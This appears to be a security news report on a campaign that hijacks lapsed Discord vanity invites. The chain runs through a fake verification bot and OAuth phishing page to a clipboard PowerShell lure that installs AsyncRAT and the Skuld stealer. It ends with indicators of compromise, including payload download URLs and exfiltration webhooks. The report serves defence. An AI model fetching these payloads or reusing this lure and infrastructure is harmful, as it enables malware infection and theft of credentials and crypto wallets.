Threat actors are exploiting Discord’s trusted invite infrastructure to redirect users to malicious servers and deploy advanced malware, including the infamous AsyncRAT remote access trojan and Skuld stealer.
This campaign leverages Discord’s popularity among gamers, crypto communities, and developers, turning the platform’s own features such as vanity invites and server boosts into vectors for phishing, credential theft, and malware distribution.
Technical Abuse of Discord Vanity
Discord allows servers with high community engagement (Level 3 Boost) to claim custom vanity invite codes.
Attackers are capitalizing on a crucial loophole: when a legitimate server’s permanent invite code expires or becomes unclaimed (often due to a downgrade or expiration of Boost status), adversaries quickly re-register the same code for attacker-controlled servers.
This enables adversaries to hijack established, trusted invite URLs found on blogs, community sites, and social media, invisibly redirecting future visitors to their own malicious Discord instance.
Exploiting Discord clients’ inconsistent invite management, attackers also take advantage of user misconceptions: users frequently believe that setting an invite to “never expire” confers permanence to any invite, but this only applies to newly generated permalinks.
When the original invite lapses, attackers monitor and claim the code, subsequently propagating phishing and malware payloads.
Once lured into the attacker’s Discord server, victims typically see only a single channel often named #verify.
Here, a malicious custom bot (posing as “Safeguard” or similar) prompts users to click a “Verify” button.
According to Dark Atlas Report, this button redirects them to a phishing website (e.g., captchaguard[.]me), masquerading as a legitimate verification or CAPTCHA portal.
Exploiting the OAuth2 authentication workflow, the phishing site tricks users into authorizing access, harvesting sensitive tokens and account metadata.
The fake portal mimics Discord’s UI, displaying a final “Verify” button activating malicious JavaScript that copies a PowerShell downloader command to the clipboard.
Unsuspecting users, often misled by instructions, run this code, initiating the malware infection chain.
Malware Payloads
The primary malware delivered is AsyncRAT (v0.5.8), a powerful open-source remote access trojan with capabilities including command execution, keylogging, remote desktop, and persistent surveillance.
This variant uses a “dead drop” resolver, dynamically downloading its Command and Control (C2) address from Pastebin, further complicating detection and takedown efforts. Additionally, a tailored version of the Skuld stealer is deployed.
Written in Go, Skuld targets browser credentials, Discord tokens, and cryptocurrency wallet secrets, specifically attacking local Exodus and Atomic wallet installations with malicious .asar JavaScript injections.
Stolen seed phrases and passwords are silently exfiltrated via Discord webhook endpoints, with the malware employing mutex logic to evade redundant infections.
This campaign stands out for its modular, multi-stage delivery mechanism utilizing trusted platforms such as GitHub, Bitbucket, and Pastebin for payload hosting and execution.
By leveraging scheduled tasks for persistence and ChromeKatz for in-memory cookie theft (circumventing Chrome’s ABE), the attackers maintain robust access while keeping detection rates low.
Campaign analysis reveals over 1,300 payload downloads, with infections reported across the U.S., Europe, and Asia.
The focus on cryptocurrency wallet theft and Discord credential compromise underscores the extensive financial motivation and operational sophistication behind these operations.
The abuse of Discord’s invite and vanity link infrastructure presents a potent and persistent threat for online communities.
Users are advised to verify the legitimacy of Discord invitations particularly those circulated on public sites and to exercise caution when directed to external verification portals.
Security teams should monitor for IOC activity, educate users on Discord invite risks, and proactively hunt for webhook- and Pastebin-based exfiltration patterns.
Indicators of Compromise (IOCs)
| Type | Value | Description |
|---|---|---|
| SHA256 | 53b65b7c38e3d3fca465c547a8c1acc53c8723877c6884f8c3495ff8ccc94fbe | AsyncRAT Sample 1 |
| SHA256 | d54fa589708546eca500fbeea44363443b86f2617c15c8f7603ff4fb05d494c1 | AsyncRAT Sample 2 |
| SHA256 | 8135f126764592be3df17200f49140bfb546ec1b2c34a153aa509465406cb46c | Skuld Stealer Variant |
| SHA256 | 160eda7ad14610d93f28b7dee20501028c1a9d4f5dc0437794ccfc2604807693 | Downloader (Updated) |
| IP | 101.99.76.120:7707 | AsyncRAT C2 |
| IP | 87.120.127.37:7707, 185.234.247.8:7707 | AsyncRAT C2 Servers |
| Domain | microads[.]top | AsyncRAT C2 Domain |
| URL | https://captchaguard[.]me/?key= | Phishing / Credential Harvest Site |
| URL | https://pastebin[.]com/raw/ftknPNF7 | AsyncRAT Dead Drop Resolver |
| URL | https://bitbucket[.]org/syscontrol6/syscontrol/downloads/cks.exe | Malware Payload |
| Webhook | https://discord[.]com/api/webhooks/1355186248578502736/_RDywh_K6… | Data Exfiltration (Skuld Stealer) |
| Webhook | https://discord[.]com/api/webhooks/1348629600560742462/RJgSAE7c… | Crypto Wallet Seeds Exfiltration |
| GitHub Loader | https://github[.]com/frfs1/update/raw/refs/heads/main/installer.exe | Initial Installer |
| Bitbucket Loader | https://bitbucket[.]org/updatevak/upd/downloads/skul.exe | Skuld Stealer Binary |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
